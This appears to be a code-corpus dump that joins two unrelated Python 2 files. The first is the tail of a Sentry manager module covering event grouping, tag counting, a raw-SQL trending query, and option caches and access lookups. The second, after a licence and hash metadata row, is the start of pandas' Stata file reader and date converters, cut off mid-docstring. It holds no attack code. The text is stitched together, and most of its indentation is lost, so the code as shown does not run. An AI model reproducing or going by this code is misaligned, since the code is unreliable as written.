if 'sentry.interfaces.Stacktrace' in data:
data['sentry.interfaces.Exception']['values'][0]['stacktrace'] = data.pop('sentry.interfaces.Stacktrace')
kwargs = {
'level': level,
'message': message,
'platform': platform,
'culprit': culprit or '',
'logger': logger_name,
}
event = Event(
project=project,
event_id=event_id,
data=data,
server_name=server_name,
site=site,
time_spent=time_spent,
datetime=date,
**kwargs
)
# Calculate the checksum from the first highest scoring interface
if not checksum:
checksum = get_checksum_from_event(event)
event.checksum = checksum
group_kwargs = kwargs.copy()
group_kwargs.update({
'last_seen': date,
'first_seen': date,
'time_spent_total': time_spent or 0,
'time_spent_count': time_spent and 1 or 0,
})
tags = data['tags']
tags.append(('level', LOG_LEVELS[level]))
            if logger_name:
tags.append(('logger', logger_name))
if server_name:
tags.append(('server_name', server_name))
if site:
tags.append(('site', site))
for plugin in plugins.for_project(project):
added_tags = safe_execute(plugin.get_tags, event)
if added_tags:
tags.extend(added_tags)
try:
group, is_new, is_sample = self._create_group(
event=event,
tags=data['tags'],
**group_kwargs
)
except Exception as exc:
# TODO: should we mail admins when there are failures?
try:
logger.exception(u'Unable to process log entry: %s', exc)
except Exception, exc:
                    warnings.warn(u'Unable to process log entry: %s' % exc)
return
using = group._state.db
event.group = group
# save the event unless its been sampled
if not is_sample:
sid = transaction.savepoint(using=using)
try:
event.save()
except IntegrityError:
transaction.savepoint_rollback(sid, using=using)
return event
transaction.savepoint_commit(sid, using=using)
sid = transaction.savepoint(using=using)
try:
EventMapping.objects.create(
project=project, group=group, event_id=event_id)
except IntegrityError:
transaction.savepoint_rollback(sid, using=using)
return event
transaction.savepoint_commit(sid, using=using)
transaction.commit_unless_managed(using=using)
if not raw:
send_group_processors(
group=group,
event=event,
is_new=is_new,
is_sample=is_sample
)
# TODO: move this to the queue
if is_new and not raw:
regression_signal.send_robust(sender=self.model, instance=group)
if getattr(settings, 'SENTRY_INDEX_SEARCH', settings.SENTRY_USE_SEARCH):
index_event.delay(event)
return event
def should_sample(self, group, event):
if not settings.SENTRY_SAMPLE_DATA:
return False
silence_timedelta = event.datetime - group.last_seen
silence = silence_timedelta.days * 86400 + silence_timedelta.seconds
if group.times_seen % count_limit(group.times_seen):
return False
if group.times_seen % time_limit(silence):
return False
return True
def _create_group(self, event, tags=None, **kwargs):
from sentry.models import ProjectCountByMinute, GroupCountByMinute
date = event.datetime
time_spent = event.time_spent
project = event.project
group, is_new = self.get_or_create(
project=project,
checksum=event.checksum,
defaults=kwargs
)
if is_new:
transaction.commit_unless_managed(using=group._state.db)
update_kwargs = {
'times_seen': 1,
}
if time_spent:
update_kwargs.update({
'time_spent_total': time_spent,
'time_spent_count': 1,
})
if not is_new:
extra = {
'last_seen': max(event.datetime, group.last_seen),
'score': ScoreClause(group),
}
if event.message and event.message != group.message:
extra['message'] = event.message
if group.level != event.level:
extra['level'] = event.level
if group.status == STATUS_RESOLVED or group.is_over_resolve_age():
# Making things atomic
is_new = bool(self.filter(
id=group.id,
status=STATUS_RESOLVED,
).exclude(
active_at__gte=date,
).update(active_at=date, status=STATUS_UNRESOLVED))
transaction.commit_unless_managed(using=group._state.db)
group.active_at = date
group.status = STATUS_UNRESOLVED
group.last_seen = extra['last_seen']
app.buffer.incr(self.model, update_kwargs, {
'id': group.id,
}, extra)
else:
# TODO: this update should actually happen as part of create
group.update(score=ScoreClause(group))
# We need to commit because the queue can run too fast and hit
# an issue with the group not existing before the buffers run
transaction.commit_unless_managed(using=group._state.db)
# Determine if we've sampled enough data to store this event
if is_new:
is_sample = False
elif not self.should_sample(group, event):
is_sample = False
else:
is_sample = True
# Rounded down to the nearest interval
normalized_datetime = normalize_datetime(date)
app.buffer.incr(GroupCountByMinute, update_kwargs, {
'group': group,
'project': project,
'date': normalized_datetime,
})
app.buffer.incr(ProjectCountByMinute, update_kwargs, {
'project': project,
'date': normalized_datetime,
})
try:
self.add_tags(group, tags)
except Exception, e:
logger.exception('Unable to record tags: %s' % (e,))
return group, is_new, is_sample
def add_tags(self, group, tags):
from sentry.models import TagValue, GroupTag
project = group.project
date = group.last_seen
for tag_item in tags:
if len(tag_item) == 2:
(key, value), data = tag_item, None
else:
key, value, data = tag_item
if not value:
continue
value = unicode(value)
if len(value) > MAX_TAG_LENGTH:
continue
app.buffer.incr(TagValue, {
'times_seen': 1,
}, {
'project': project,
'key': key,
'value': value,
}, {
'last_seen': date,
'data': data,
})
app.buffer.incr(GroupTag, {
'times_seen': 1,
}, {
'group': group,
'project': project,
'key': key,
'value': value,
}, {
'last_seen': date,
})
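    # Illustrative sketch: each entry in `tags` is a 2-tuple or 3-tuple, e.g.
    #   [('browser', 'Firefox 23'), ('release', 'abc123', {'build': 7})]
    # where the optional third element is persisted on TagValue.data through
    # the buffer increment above.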
def get_by_natural_key(self, project, logger, culprit, checksum):
return self.get(project=project, logger=logger, view=culprit, checksum=checksum)
@memoize
def model_fields_clause(self):
return ', '.join('sentry_groupedmessage."%s"' % (f.column,) for f in self.model._meta.fields)
def get_accelerated(self, project_ids, queryset=None, minutes=15):
if not project_ids:
return self.none()
if queryset is None:
queryset = self.filter(
project__in=project_ids,
status=STATUS_UNRESOLVED,
)
else:
queryset = queryset._clone()
queryset.query.select_related = False
normalization = float(MINUTE_NORMALIZATION)
assert minutes >= normalization
intervals = 8
engine = get_db_engine(queryset.db)
# We technically only support mysql and postgresql, since there seems to be no standard
# way to get the epoch from a datetime/interval
if engine.startswith('mysql'):
minute_clause = "interval %s minute"
epoch_clause = "unix_timestamp(utc_timestamp()) - unix_timestamp(mcbm.date)"
now_clause = 'utc_timestamp()'
else:
minute_clause = "interval '%s minutes'"
epoch_clause = "extract(epoch from now()) - extract(epoch from mcbm.date)"
now_clause = 'now()'
sql, params = queryset.query.get_compiler(queryset.db).as_sql()
before_select, after_select = str(sql).split('SELECT ', 1)
after_where = after_select.split(' WHERE ', 1)[1]
# Ensure we remove any ordering clause
after_where = after_where.split(' ORDER BY ')[0]
query = """
SELECT ((mcbm.times_seen + 1) / ((%(epoch_clause)s) / 60)) / (COALESCE(z.rate, 0) + 1) as sort_value,
%(fields)s
FROM sentry_groupedmessage
INNER JOIN sentry_messagecountbyminute as mcbm
ON (sentry_groupedmessage.id = mcbm.group_id)
LEFT JOIN (SELECT a.group_id, (SUM(a.times_seen)) / COUNT(a.times_seen) / %(norm)f as rate
FROM sentry_messagecountbyminute as a
WHERE a.date >= %(now)s - %(max_time)s
AND a.date < %(now)s - %(min_time)s
AND a.project_id IN (%(project_ids)s)
GROUP BY a.group_id) as z
ON z.group_id = mcbm.group_id
WHERE mcbm.date >= %(now)s - %(min_time)s
AND mcbm.date < %(now)s - %(offset_time)s
AND mcbm.times_seen > 0
AND ((mcbm.times_seen + 1) / ((%(epoch_clause)s) / 60)) > (COALESCE(z.rate, 0) + 1)
AND %(after_where)s
GROUP BY z.rate, mcbm.times_seen, mcbm.date, %(fields)s
ORDER BY sort_value DESC
""" % dict(
fields=self.model_fields_clause,
after_where=after_where,
offset_time=minute_clause % (1,),
min_time=minute_clause % (minutes + 1,),
max_time=minute_clause % (minutes * intervals + 1,),
norm=normalization,
epoch_clause=epoch_clause,
now=now_clause,
project_ids=', '.join((str(int(x)) for x in project_ids)),
)
return RawQuerySet(self, query, params)
class RawQuerySet(object):
def __init__(self, queryset, query, params):
self.queryset = queryset
self.query = query
self.params = params
def __getitem__(self, k):
offset = k.start or 0
limit = k.stop - offset
limit_clause = ' LIMIT %d OFFSET %d' % (limit, offset)
query = self.query + limit_clause
return self.queryset.raw(query, self.params)
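# Illustrative usage (sketch): a caller typically slices the RawQuerySet
# returned by get_accelerated() to paginate, e.g.
#
#   Group.objects.get_accelerated([project.id], minutes=15)[0:25]
#
# which appends "LIMIT 25 OFFSET 0" to the raw SQL and hands it to .raw().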
class ProjectManager(BaseManager, ChartMixin):
def get_for_user(self, user=None, access=None, hidden=False, team=None,
superuser=True):
"""
Returns a SortedDict of all projects a user has some level of access to.
"""
from sentry.models import Team
if not (user and user.is_authenticated()):
return []
# TODO: the result of this function should be cached
is_authenticated = (user and user.is_authenticated())
base_qs = self
if not hidden:
base_qs = base_qs.filter(status=0)
if team:
base_qs = base_qs.filter(team=team)
if team and user.is_superuser and superuser:
projects = set(base_qs)
else:
projects_qs = base_qs
if not settings.SENTRY_PUBLIC:
# If the user is authenticated, include their memberships
teams = Team.objects.get_for_user(
user, access, access_groups=False).values()
if not teams:
projects_qs = self.none()
if team and team not in teams:
projects_qs = self.none()
elif not team:
projects_qs = projects_qs.filter(team__in=teams)
projects = set(projects_qs)
if is_authenticated:
projects |= set(base_qs.filter(accessgroup__members=user))
attach_foreignkey(projects, self.model.team)
return sorted(projects, key=lambda x: x.name.lower())
class MetaManager(BaseManager):
NOTSET = object()
def __init__(self, *args, **kwargs):
super(MetaManager, self).__init__(*args, **kwargs)
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
        # we can't serialize weakrefs
d.pop('_MetaManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def get_value(self, key, default=NOTSET):
result = self.get_all_values()
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, key):
self.filter(key=key).delete()
self.__metadata.pop(key, None)
def set_value(self, key, value):
inst, _ = self.get_or_create(
key=key,
defaults={
'value': value,
}
)
if inst.value != value:
inst.update(value=value)
self.__metadata[key] = value
def get_all_values(self):
if not hasattr(self, '_MetaManager__metadata'):
self.__metadata = dict(self.values_list('key', 'value'))
return self.__metadata
def clear_cache(self, **kwargs):
self.__metadata = {}
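# Illustrative usage (a sketch, assuming an Option-style key/value model wires
# this manager up as its default `objects` manager):
#
#   Option.objects.set_value('sentry:version', '5.0.0')
#   Option.objects.get_value('sentry:version', default=None)  # -> '5.0.0'
#
# Values are cached per-process in __metadata and cleared after every task or
# request via the signals connected in __init__.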
class InstanceMetaManager(BaseManager):
NOTSET = object()
def __init__(self, field_name, *args, **kwargs):
super(InstanceMetaManager, self).__init__(*args, **kwargs)
self.field_name = field_name
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
        # we can't serialize weakrefs
d.pop('_InstanceMetaManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def _make_key(self, instance):
if isinstance(instance, models.Model):
instance_id = instance.pk
else:
instance_id = instance
return '%s:%s' % (self.model._meta.db_table, instance_id)
def get_value_bulk(self, instances, key):
return dict(self.filter(**{
'%s__in' % self.field_name: instances,
'key': key,
}).values_list(self.field_name, 'value'))
def get_value(self, instance, key, default=NOTSET):
result = self.get_all_values(instance)
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, instance, key):
self.filter(**{self.field_name: instance, 'key': key}).delete()
if instance.pk not in self.__metadata:
cache.delete(self._make_key(instance))
return
self.__metadata[instance.pk].pop(key, None)
cache.set(self._make_key(instance), self.__metadata[instance.pk])
def set_value(self, instance, key, value):
inst, created = self.get_or_create(**{
self.field_name: instance,
'key': key,
'defaults': {
'value': value,
}
})
if not created and inst.value != value:
inst.update(value=value)
if instance.pk not in self.__metadata:
cache.delete(self._make_key(instance))
return
self.__metadata[instance.pk][key] = value
cache.set(self._make_key(instance), self.__metadata[instance.pk])
def get_all_values(self, instance):
if isinstance(instance, models.Model):
instance_id = instance.pk
else:
instance_id = instance
if instance_id not in self.__metadata:
cache_key = self._make_key(instance)
result = cache.get(cache_key)
if result is None:
result = dict(
(i.key, i.value) for i in
self.filter(**{
self.field_name: instance_id,
})
)
cache.set(cache_key, result)
self.__metadata[instance_id] = result
return self.__metadata.get(instance_id, {})
def clear_cache(self, **kwargs):
self.__metadata = {}
class UserOptionManager(BaseManager):
NOTSET = object()
def __init__(self, *args, **kwargs):
super(UserOptionManager, self).__init__(*args, **kwargs)
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
        # we can't serialize weakrefs
d.pop('_UserOptionManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def get_value(self, user, project, key, default=NOTSET):
result = self.get_all_values(user, project)
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, user, project, key):
self.filter(user=user, project=project, key=key).delete()
        if not hasattr(self, '_UserOptionManager__metadata'):
return
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
return
self.__metadata[metakey].pop(key, None)
def set_value(self, user, project, key, value):
inst, created = self.get_or_create(
user=user,
project=project,
key=key,
defaults={
'value': value,
},
)
if not created and inst.value != value:
inst.update(value=value)
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
return
self.__metadata[metakey][key] = value
def get_all_values(self, user, project):
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
result = dict(
(i.key, i.value) for i in
self.filter(
user=user,
project=project,
)
)
self.__metadata[metakey] = result
return self.__metadata.get(metakey, {})
def clear_cache(self, **kwargs):
self.__metadata = {}
class TagKeyManager(BaseManager):
def _get_cache_key(self, project_id):
return 'filterkey:all:%s' % project_id
def all_keys(self, project):
# TODO: cache invalidation via post_save/post_delete signals much like BaseManager
key = self._get_cache_key(project.id)
result = cache.get(key)
if result is None:
result = list(self.filter(project=project).values_list('key', flat=True))
cache.set(key, result, 60)
return result
class TeamManager(BaseManager):
def get_for_user(self, user, access=None, access_groups=True, with_projects=False):
"""
Returns a SortedDict of all teams a user has some level of access to.
Each <Team> returned has a ``membership`` attribute which holds the
<TeamMember> instance.
"""
from sentry.models import TeamMember, AccessGroup, Project
results = SortedDict()
if not user.is_authenticated():
return results
if settings.SENTRY_PUBLIC and access is None:
for team in sorted(self.iterator(), key=lambda x: x.name.lower()):
results[team.slug] = team
else:
all_teams = set()
qs = TeamMember.objects.filter(
user=user,
).select_related('team')
if access is not None:
qs = qs.filter(type__lte=access)
for tm in qs:
all_teams.add(tm.team)
if access_groups:
qs = AccessGroup.objects.filter(
members=user,
).select_related('team')
if access is not None:
qs = qs.filter(type__lte=access)
for group in qs:
all_teams.add(group.team)
for team in sorted(all_teams, key=lambda x: x.name.lower()):
results[team.slug] = team
if with_projects:
# these kinds of queries make people sad :(
new_results = SortedDict()
for team in results.itervalues():
project_list = list(Project.objects.get_for_user(
user, team=team))
new_results[team.slug] = (team, project_list)
results = new_results
return results
| bsd-3-clause | 8,448,772,539,851,207,000 | 32.712077 | 125 | 0.547088 | false | 4.165712 | false | false | false |
kenshay/ImageScripter | ProgramData/SystemFiles/Python/Lib/site-packages/pandas/io/stata.py | 7 | 82769 |
"""
Module contains tools for processing Stata files into DataFrames
The StataReader below was originally written by Joe Presbrey as part of PyDTA.
It has been extended and improved by Skipper Seabold from the Statsmodels
project who also developed the StataWriter and was finally added to pandas in
a once again improved version.
You can find more information on http://presbrey.mit.edu/PyDTA and
http://www.statsmodels.org/devel/
"""
import numpy as np
import sys
import struct
from dateutil.relativedelta import relativedelta
from pandas.types.common import (is_categorical_dtype, is_datetime64_dtype,
_ensure_object)
from pandas.core.base import StringMixin
from pandas.core.categorical import Categorical
from pandas.core.frame import DataFrame
from pandas.core.series import Series
import datetime
from pandas import compat, to_timedelta, to_datetime, isnull, DatetimeIndex
from pandas.compat import lrange, lmap, lzip, text_type, string_types, range, \
zip, BytesIO
from pandas.util.decorators import Appender
import pandas as pd
from pandas.io.common import get_filepath_or_buffer, BaseIterator
from pandas.lib import max_len_string_array, infer_dtype
from pandas.tslib import NaT, Timestamp
_version_error = ("Version of given Stata file is not 104, 105, 108, "
"111 (Stata 7SE), 113 (Stata 8/9), 114 (Stata 10/11), "
"115 (Stata 12), 117 (Stata 13), or 118 (Stata 14)")
_statafile_processing_params1 = """\
convert_dates : boolean, defaults to True
Convert date variables to DataFrame time values
convert_categoricals : boolean, defaults to True
Read value labels and convert columns to Categorical/Factor variables"""
_encoding_params = """\
encoding : string, None or encoding
Encoding used to parse the files. None defaults to iso-8859-1."""
_statafile_processing_params2 = """\
index : identifier of index column
identifier of column that should be used as index of the DataFrame
convert_missing : boolean, defaults to False
Flag indicating whether to convert missing values to their Stata
representations. If False, missing values are replaced with nans.
If True, columns containing missing values are returned with
object data types and missing values are represented by
StataMissingValue objects.
preserve_dtypes : boolean, defaults to True
Preserve Stata datatypes. If False, numeric data are upcast to pandas
default types for foreign data (float64 or int64)
columns : list or None
Columns to retain. Columns will be returned in the given order. None
returns all columns
order_categoricals : boolean, defaults to True
Flag indicating whether converted categorical data are ordered."""
_chunksize_params = """\
chunksize : int, default None
Return StataReader object for iterations, returns chunks with
given number of lines"""
_iterator_params = """\
iterator : boolean, default False
Return StataReader object"""
_read_stata_doc = """Read Stata file into DataFrame
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or object implementing a binary read() functions
%s
%s
%s
%s
%s
Returns
-------
DataFrame or StataReader
Examples
--------
Read a Stata dta file:
>>> df = pandas.read_stata('filename.dta')
Read a Stata dta file in 10,000 line chunks:
>>> itr = pandas.read_stata('filename.dta', chunksize=10000)
>>> for chunk in itr:
>>> do_something(chunk)
""" % (_statafile_processing_params1, _encoding_params,
_statafile_processing_params2, _chunksize_params,
_iterator_params)
_data_method_doc = """Reads observations from Stata file, converting them into a dataframe
This is a legacy method. Use `read` in new code.
Parameters
----------
%s
%s
Returns
-------
DataFrame
""" % (_statafile_processing_params1, _statafile_processing_params2)
_read_method_doc = """\
Reads observations from Stata file, converting them into a dataframe
Parameters
----------
nrows : int
Number of lines to read from data file, if None read whole file.
%s
%s
Returns
-------
DataFrame
""" % (_statafile_processing_params1, _statafile_processing_params2)
_stata_reader_doc = """\
Class for reading Stata dta files.
Parameters
----------
path_or_buf : string or file-like object
Path to .dta file or object implementing a binary read() functions
%s
%s
%s
%s
""" % (_statafile_processing_params1, _statafile_processing_params2,
_encoding_params, _chunksize_params)
@Appender(_read_stata_doc)
def read_stata(filepath_or_buffer, convert_dates=True,
convert_categoricals=True, encoding=None, index=None,
convert_missing=False, preserve_dtypes=True, columns=None,
order_categoricals=True, chunksize=None, iterator=False):
reader = StataReader(filepath_or_buffer,
convert_dates=convert_dates,
convert_categoricals=convert_categoricals,
index=index, convert_missing=convert_missing,
preserve_dtypes=preserve_dtypes,
columns=columns,
order_categoricals=order_categoricals,
chunksize=chunksize, encoding=encoding)
if iterator or chunksize:
data = reader
else:
data = reader.read()
reader.close()
return data
_date_formats = ["%tc", "%tC", "%td", "%d", "%tw", "%tm", "%tq", "%th", "%ty"]
stata_epoch = datetime.datetime(1960, 1, 1)
def _stata_elapsed_date_to_datetime_vec(dates, fmt):
"""
Convert from SIF to datetime. http://www.stata.com/help.cgi?datetime
Parameters
----------
dates : Series
The Stata Internal Format date to convert to datetime according to fmt
fmt : str
The format to convert to. Can be, tc, td, tw, tm, tq, th, ty
Returns
-------
converted : Series
The converted dates
Examples
--------
>>> import pandas as pd
>>> dates = pd.Series([52])
    >>> _stata_elapsed_date_to_datetime_vec(dates, "%tw")
0 1961-01-01
dtype: datetime64[ns]
Notes
-----
datetime/c - tc
milliseconds since 01jan1960 00:00:00.000, assuming 86,400 s/day
datetime/C - tC - NOT IMPLEMENTED
milliseconds since 01jan1960 00:00:00.000, adjusted for leap seconds
date - td
days since 01jan1960 (01jan1960 = 0)
weekly date - tw
weeks since 1960w1
This assumes 52 weeks in a year, then adds 7 * remainder of the weeks.
The datetime value is the start of the week in terms of days in the
year, not ISO calendar weeks.
monthly date - tm
months since 1960m1
quarterly date - tq
quarters since 1960q1
half-yearly date - th
        half-years since 1960h1
    yearly date - ty
years since 0000
If you don't have pandas with datetime support, then you can't do
milliseconds accurately.
"""
MIN_YEAR, MAX_YEAR = Timestamp.min.year, Timestamp.max.year
MAX_DAY_DELTA = (Timestamp.max - datetime.datetime(1960, 1, 1)).days
MIN_DAY_DELTA = (Timestamp.min - datetime.datetime(1960, 1, 1)).days
MIN_MS_DELTA = MIN_DAY_DELTA * 24 * 3600 * 1000
MAX_MS_DELTA = MAX_DAY_DELTA * 24 * 3600 * 1000
def convert_year_month_safe(year, month):
"""
Convert year and month to datetimes, using pandas vectorized versions
when the date range falls within the range supported by pandas. Other
wise it falls back to a slower but more robust method using datetime.
"""
if year.max() < MAX_YEAR and year.min() > MIN_YEAR:
return to_datetime(100 * year + month, format='%Y%m')
else:
index = getattr(year, 'index', None)
return Series(
[datetime.datetime(y, m, 1) for y, m in zip(year, month)],
index=index)
def convert_year_days_safe(year, days):
"""
Converts year (e.g. 1999) and days since the start of the year to a
datetime or datetime64 Series
"""
if year.max() < (MAX_YEAR - 1) and year.min() > MIN_YEAR:
return (to_datetime(year, format='%Y') +
to_timedelta(days, unit='d'))
else:
index = getattr(year, 'index', None)
value = [datetime.datetime(y, 1, 1) + relativedelta(days=int(d))
for y, d in zip(year, days)]
return Series(value, index=index)
def convert_delta_safe(base, deltas, unit):
"""
Convert base dates and deltas to datetimes, using pandas vectorized
versions if the deltas satisfy restrictions required to be expressed
as dates in pandas.
"""
index = getattr(deltas, 'index', None)
if unit == 'd':
if deltas.max() > MAX_DAY_DELTA or deltas.min() < MIN_DAY_DELTA:
values = [base + relativedelta(days=int(d)) for d in deltas]
return Series(values, index=index)
elif unit == 'ms':
if deltas.max() > MAX_MS_DELTA or deltas.min() < MIN_MS_DELTA:
values = [base + relativedelta(microseconds=(int(d) * 1000))
for d in deltas]
return Series(values, index=index)
else:
raise ValueError('format not understood')
base = to_datetime(base)
deltas = to_timedelta(deltas, unit=unit)
return base + deltas
# TODO: If/when pandas supports more than datetime64[ns], this should be
# improved to use correct range, e.g. datetime[Y] for yearly
bad_locs = np.isnan(dates)
has_bad_values = False
if bad_locs.any():
has_bad_values = True
data_col = Series(dates)
data_col[bad_locs] = 1.0 # Replace with NaT
dates = dates.astype(np.int64)
if fmt in ["%tc", "tc"]: # Delta ms relative to base
base = stata_epoch
ms = dates
conv_dates = convert_delta_safe(base, ms, 'ms')
elif fmt in ["%tC", "tC"]:
from warnings import warn
warn("Encountered %tC format. Leaving in Stata Internal Format.")
conv_dates = Series(dates, dtype=np.object)
if has_bad_values:
conv_dates[bad_locs] = pd.NaT
return conv_dates
elif fmt in ["%td", "td", "%d", "d"]: # Delta days relative to base
base = stata_epoch
days = dates
conv_dates = convert_delta_safe(base, days, 'd')
elif fmt in ["%tw", "tw"]: # does not count leap days - 7 days is a week
year = stata_epoch.year + dates // 52
days = (dates % 52) * 7
conv_dates = convert_year_days_safe(year, days)
elif fmt in ["%tm", "tm"]: # Delta months relative to base
year = stata_epoch.year + dates // 12
month = (dates % 12) + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%tq", "tq"]: # Delta quarters relative to base
year = stata_epoch.year + dates // 4
month = (dates % 4) * 3 + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%th", "th"]: # Delta half-years relative to base
year = stata_epoch.year + dates // 2
month = (dates % 2) * 6 + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%ty", "ty"]: # Years -- not delta
year = dates
month = np.ones_like(dates)
conv_dates = convert_year_month_safe(year, month)
else:
raise ValueError("Date fmt %s not understood" % fmt)
if has_bad_values: # Restore NaT for bad values
conv_dates[bad_locs] = NaT
return conv_dates
def _datetime_to_stata_elapsed_vec(dates, fmt):
"""
Convert from datetime to SIF. http://www.stata.com/help.cgi?datetime
Parameters
----------
dates : Series
Series or array containing datetime.datetime or datetime64[ns] to
convert to the Stata Internal Format given by fmt
fmt : str
The format to convert to. Can be, tc, td, tw, tm, tq, th, ty
"""
index = dates.index
NS_PER_DAY = 24 * 3600 * 1000 * 1000 * 1000
US_PER_DAY = NS_PER_DAY / 1000
def parse_dates_safe(dates, delta=False, year=False, days=False):
d = {}
if is_datetime64_dtype(dates.values):
if delta:
delta = dates - stata_epoch
d['delta'] = delta.values.astype(
np.int64) // 1000 # microseconds
if days or year:
dates = DatetimeIndex(dates)
d['year'], d['month'] = dates.year, dates.month
if days:
days = (dates.astype(np.int64) -
to_datetime(d['year'], format='%Y').astype(np.int64))
d['days'] = days // NS_PER_DAY
elif infer_dtype(dates) == 'datetime':
if delta:
delta = dates.values - stata_epoch
f = lambda x: \
US_PER_DAY * x.days + 1000000 * x.seconds + x.microseconds
v = np.vectorize(f)
d['delta'] = v(delta)
if year:
year_month = dates.apply(lambda x: 100 * x.year + x.month)
d['year'] = year_month.values // 100
d['month'] = (year_month.values - d['year'] * 100)
if days:
f = lambda x: (x - datetime.datetime(x.year, 1, 1)).days
v = np.vectorize(f)
d['days'] = v(dates)
else:
raise ValueError('Columns containing dates must contain either '
'datetime64, datetime.datetime or null values.')
return DataFrame(d, index=index)
bad_loc = isnull(dates)
index = dates.index
if bad_loc.any():
dates = Series(dates)
if is_datetime64_dtype(dates):
dates[bad_loc] = to_datetime(stata_epoch)
else:
dates[bad_loc] = stata_epoch
if fmt in ["%tc", "tc"]:
d = parse_dates_safe(dates, delta=True)
conv_dates = d.delta / 1000
elif fmt in ["%tC", "tC"]:
from warnings import warn
warn("Stata Internal Format tC not supported.")
conv_dates = dates
elif fmt in ["%td", "td"]:
d = parse_dates_safe(dates, delta=True)
conv_dates = d.delta // US_PER_DAY
elif fmt in ["%tw", "tw"]:
d = parse_dates_safe(dates, year=True, days=True)
conv_dates = (52 * (d.year - stata_epoch.year) + d.days // 7)
elif fmt in ["%tm", "tm"]:
d = parse_dates_safe(dates, year=True)
conv_dates = (12 * (d.year - stata_epoch.year) + d.month - 1)
elif fmt in ["%tq", "tq"]:
d = parse_dates_safe(dates, year=True)
conv_dates = 4 * (d.year - stata_epoch.year) + (d.month - 1) // 3
elif fmt in ["%th", "th"]:
d = parse_dates_safe(dates, year=True)
conv_dates = 2 * (d.year - stata_epoch.year) + \
(d.month > 6).astype(np.int)
elif fmt in ["%ty", "ty"]:
d = parse_dates_safe(dates, year=True)
conv_dates = d.year
else:
raise ValueError("Format %s is not a known Stata date format" % fmt)
conv_dates = Series(conv_dates, dtype=np.float64)
missing_value = struct.unpack('<d', b'\x00\x00\x00\x00\x00\x00\xe0\x7f')[0]
conv_dates[bad_loc] = missing_value
return Series(conv_dates, index=index)
excessive_string_length_error = """
Fixed width strings in Stata .dta files are limited to 244 (or fewer)
characters. Column '%s' does not satisfy this restriction.
"""
class PossiblePrecisionLoss(Warning):
pass
precision_loss_doc = """
Column converted from %s to %s, and some data are outside of the lossless
conversion range. This may result in a loss of precision in the saved data.
"""
class ValueLabelTypeMismatch(Warning):
pass
value_label_mismatch_doc = """
Stata value labels (pandas categories) must be strings. Column {0} contains
non-string labels which will be converted to strings. Please check that the
Stata data file created has not lost information due to duplicate labels.
"""
class InvalidColumnName(Warning):
pass
invalid_name_doc = """
Not all pandas column names were valid Stata variable names.
The following replacements have been made:
{0}
If this is not what you expect, please make sure you have Stata-compliant
column names in your DataFrame (strings only, max 32 characters, only
alphanumerics and underscores, no Stata reserved words)
"""
def _cast_to_stata_types(data):
"""Checks the dtypes of the columns of a pandas DataFrame for
compatibility with the data types and ranges supported by Stata, and
converts if necessary.
Parameters
----------
data : DataFrame
The DataFrame to check and convert
Notes
-----
Numeric columns in Stata must be one of int8, int16, int32, float32 or
float64, with some additional value restrictions. int8 and int16 columns
are checked for violations of the value restrictions and upcast if needed.
int64 data is not usable in Stata, and so it is downcast to int32 whenever
    the values are in the int32 range, and sidecast to float64 when larger than
    this range. If the int64 values are outside of the range of those
    perfectly representable as float64 values, a warning is raised.
    bool columns are cast to int8. uint columns are converted to int of the
    same size if there is no loss in precision, otherwise they are upcast to a
    larger type. uint64 is currently not supported since it is converted to
object in a DataFrame.
"""
ws = ''
# original, if small, if large
conversion_data = ((np.bool, np.int8, np.int8),
(np.uint8, np.int8, np.int16),
(np.uint16, np.int16, np.int32),
(np.uint32, np.int32, np.int64))
float32_max = struct.unpack('<f', b'\xff\xff\xff\x7e')[0]
float64_max = struct.unpack('<d', b'\xff\xff\xff\xff\xff\xff\xdf\x7f')[0]
for col in data:
dtype = data[col].dtype
# Cast from unsupported types to supported types
for c_data in conversion_data:
if dtype == c_data[0]:
if data[col].max() <= np.iinfo(c_data[1]).max:
dtype = c_data[1]
else:
dtype = c_data[2]
if c_data[2] == np.float64: # Warn if necessary
if data[col].max() >= 2 ** 53:
ws = precision_loss_doc % ('uint64', 'float64')
data[col] = data[col].astype(dtype)
# Check values and upcast if necessary
if dtype == np.int8:
if data[col].max() > 100 or data[col].min() < -127:
data[col] = data[col].astype(np.int16)
elif dtype == np.int16:
if data[col].max() > 32740 or data[col].min() < -32767:
data[col] = data[col].astype(np.int32)
elif dtype == np.int64:
if (data[col].max() <= 2147483620 and
data[col].min() >= -2147483647):
data[col] = data[col].astype(np.int32)
else:
data[col] = data[col].astype(np.float64)
if data[col].max() >= 2 ** 53 or data[col].min() <= -2 ** 53:
ws = precision_loss_doc % ('int64', 'float64')
elif dtype in (np.float32, np.float64):
value = data[col].max()
if np.isinf(value):
msg = 'Column {0} has a maximum value of infinity which is ' \
'outside the range supported by Stata.'
raise ValueError(msg.format(col))
if dtype == np.float32 and value > float32_max:
data[col] = data[col].astype(np.float64)
elif dtype == np.float64:
if value > float64_max:
                    msg = 'Column {0} has a maximum value ({1}) outside the ' \
                          'range supported by Stata ({2})'
raise ValueError(msg.format(col, value, float64_max))
if ws:
import warnings
warnings.warn(ws, PossiblePrecisionLoss)
return data
class StataValueLabel(object):
"""
Parse a categorical column and prepare formatted output
    Parameters
    -----------
    catarray : Categorical
        Categorical column (pandas Series of category dtype) whose codes and
        categories become the Stata value labels
    Attributes
